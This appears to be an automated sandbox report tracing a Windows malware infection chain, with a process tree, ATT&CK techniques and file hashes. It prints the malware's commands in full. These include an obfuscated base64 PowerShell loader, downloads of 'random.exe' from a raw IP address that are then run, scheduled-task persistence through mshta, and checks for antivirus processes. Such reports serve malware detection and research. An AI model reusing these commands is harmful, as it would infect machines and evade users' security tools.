- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3408
-
-
C:\Users\Admin\AppData\Local\Temp\10367520101\59ee8e938d.exe"C:\Users\Admin\AppData\Local\Temp\10367520101\59ee8e938d.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3932 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10367520101\59ee8e938d.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
PID:3132
-
-
-
C:\Users\Admin\AppData\Local\Temp\10367530101\ecdc428e8a.exe"C:\Users\Admin\AppData\Local\Temp\10367530101\ecdc428e8a.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3760 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10367530101\ecdc428e8a.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3848
-
-
-
C:\Users\Admin\AppData\Local\Temp\10367540101\42c2c6457d.exe"C:\Users\Admin\AppData\Local\Temp\10367540101\42c2c6457d.exe"6⤵
- Executes dropped EXE
PID:3956 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3956 -s 647⤵PID:3472
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10367551121\2GF9eeb.cmd"6⤵
- System Location Discovery: System Language Discovery
PID:3248 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10367551121\2GF9eeb.cmd"7⤵
- System Location Discovery: System Language Discovery
PID:3168 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3292
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10367560101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10367560101\EPTwCQd.exe"6⤵
- Executes dropped EXE
PID:3844 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3844 -s 287⤵PID:3672
-
-
-
C:\Users\Admin\AppData\Local\Temp\10367570101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10367570101\Rm3cVPI.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3856
-
-
C:\Users\Admin\AppData\Local\Temp\10367580101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10367580101\7IIl2eE.exe"6⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3928 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat7⤵
- System Location Discovery: System Language Discovery
PID:3140 -
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3776
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵
- System Location Discovery: System Language Discovery
PID:3860
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3800
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵
- System Location Discovery: System Language Discovery
PID:3792
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183778⤵
- System Location Discovery: System Language Discovery
PID:3988
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab8⤵PID:2556
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation8⤵
- System Location Discovery: System Language Discovery
PID:3340
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com8⤵
- System Location Discovery: System Language Discovery
PID:3416
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N8⤵
- System Location Discovery: System Language Discovery
PID:2320
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2588
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 58⤵PID:3844
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10367590101\93fb3e09f2.exe"C:\Users\Admin\AppData\Local\Temp\10367590101\93fb3e09f2.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3044 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 3847⤵
- Program crash
PID:3916
-
-
-
C:\Users\Admin\AppData\Local\Temp\10367600101\u75a1_003.exe"C:\Users\Admin\AppData\Local\Temp\10367600101\u75a1_003.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3248
-
-
C:\Users\Admin\AppData\Local\Temp\10367610101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10367610101\TbV75ZR.exe"6⤵
- Executes dropped EXE
PID:3368 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3368 -s 447⤵PID:3428
-
-
-
C:\Users\Admin\AppData\Local\Temp\10367620101\1b48d113ab.exe"C:\Users\Admin\AppData\Local\Temp\10367620101\1b48d113ab.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3668 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn ZacZWmalZgG /tr "mshta C:\Users\Admin\AppData\Local\Temp\KV2GMbI1u.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
PID:3696 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn ZacZWmalZgG /tr "mshta C:\Users\Admin\AppData\Local\Temp\KV2GMbI1u.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2408
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\KV2GMbI1u.hta7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:3692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'Z3M2RN3EQL2RSXBMV2NGCEGXBJKOHZCM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708 -
C:\Users\Admin\AppData\Local\TempZ3M2RN3EQL2RSXBMV2NGCEGXBJKOHZCM.EXE"C:\Users\Admin\AppData\Local\TempZ3M2RN3EQL2RSXBMV2NGCEGXBJKOHZCM.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3868
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10367630121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:3348 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3416
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵PID:2384
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:3676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:3700 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3520
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "Zw6NdmaotKG" /tr "mshta \"C:\Temp\A70GoOmpq.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3688
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\A70GoOmpq.hta"7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2096 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3604 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2932
-
-
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
6Windows Service
6Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
6Windows Service
6Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
6Disable or Modify Tools
5Modify Registry
8Pre-OS Boot
1Bootkit
1Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7CNUR30T\soft[1]
Filesize3.0MB
MD52cb4cdd698f1cbc9268d2c6bcd592077
SHA186e68f04bc99f21c9d6e32930c3709b371946165
SHA256c89a0fea7c3850c8bf4b6a231a34cfb699c97783b1b2b1176070dd4d9cb4bd4a
SHA512606216ce50d2c89f4700fd3f8853b09f5626615cac64bfe304c15524a908b4a220abed1a023b0f099d390a2e5b14e1dc4f94840aa398658188ad299c93939de3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7CNUR30T\success[1].htm
Filesize1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
236KB
MD52ecb51ab00c5f340380ecf849291dbcf
SHA11a4dffbce2a4ce65495ed79eab42a4da3b660931
SHA256f1b3e0f2750a9103e46a6a4a34f1cf9d17779725f98042cc2475ec66484801cf
SHA512e241a48eafcaf99187035f0870d24d74ae97fe84aaadd2591cceea9f64b8223d77cfb17a038a58eadd3b822c5201a6f7494f26eea6f77d95f77f6c668d088e6b
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\activity-stream.discovery_stream.json.tmp
Filesize26KB
MD552e97ce6d2fd68d1cdcbb38b482cf5ce
SHA1b4bd181035f4c1df072e0448dab0fa045e3a9c8e
SHA256cc504115a0fab29bf154211bfe18448d54f0bba69cfa9db773a9e460e5f1446a
SHA5124cbe861c14035d39d17fca849f8ad63ba5fb7e929ef835a38cee7c178ddd828959018ae66776f638e4b3c83e3794951022101ba36efd7c8ad3e6aeccf6dfc639
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
1.2MB
MD5646254853368d4931ced040b46e9d447
SHA1c9e4333c6feb4f0aeedf072f3a293204b9e81e28
SHA2565a6764d23bb3d50f08f15b95e214a6dca0afb78e7416a21b72982c3649a49e9e
SHA512485f252cd358ea41be648e013dc3ddeee1e57f8dea3ef42a5c8236a9769e7ebcf8bae1d5a36f55b6fb2cdcbbcf1878eca7d7885b63445cb081688a9512512819
-
Filesize
634KB
MD5d62b289592043f863f302d7e8582e9bc
SHA1cc72a132de961bb1f4398b933d88585ef8c29a41
SHA2563c5a551b8fee65ffc444a3c0730b990591c3a95e442426563539f0a2ca3871d2
SHA51263d389102c1b78ea5157aad0a3f45f351a5752ae896729d85be81b70721f19869efdb8dfa87906f891be9bec0d9154b7498e4ac4216fd3ec574fae64707e258c
-
Filesize
1.1MB
MD53928c62b67fc0d7c1fb6bcce3b6a8d46
SHA1e843b7b7524a46a273267a86e320c98bc09e6d44
SHA256630e00afe98ad4c1db391b74a84b7822a3abb3867a34f2ba163a8bf26d8d4397
SHA5121884b125c89e32b6e5924e87ad9af827ae7e950ac80411e00a58c465eed88060af72142f9c512e0323e1ade46061f56a5247351e1c1d5e268f2ba35b5e447857
-
Filesize
2.0MB
MD528b543db648763fac865cab931bb3f91
SHA1b6688b85d6c6d1bd45a3db2d108b6acf7467b0b4
SHA256701b7ef0b368ddbe9e3d2ddaaaf10284287f38799e536336dc4c821930f13906
SHA5127d514fc036efc8d57d400e7e84f5b565f40dc0f74a536c708b3fe5d6725e5d4541157e29f514e0706fad6d4159e0b863bedf757eca4df3e87927e462502a02d2
-
Filesize
7.6MB
MD50c59247836a85a1ed74bb473f43e64c0
SHA1a79e980fc3edc2843728f290dab4e0cd8ee7b7df
SHA2563b5f0953fbedf84cc5241477466d545e96889b1de36eded7d4a407f4ce7b12dd
SHA5125c8f55b95f8d6ec32c0975a95c2f891234cd2671efd7f6bc743d5875345d4eece716391263327899444076c1525e45ff7c7ea7cf0b89dc3aa3c890c3bd3ddeb5
-
Filesize
712KB
MD5e714f21784ba313bf9b0ceb2c138895a
SHA1cabe70a2b37e02706d9118702e1692735a6c7b9a
SHA2568730a3f5b2e25609cf42ee706bd062ab31c7499f51780f015815b2f9ad1dce44
SHA512c99a439bad99363a10df4e0669e4670d80fdab3947df535c4f3b421f09922dbef8b4f7b7a7f8c9dc167dd2f3ff0fc7ce55621335978679f89bf3a702553b932b
-
Filesize
4.4MB
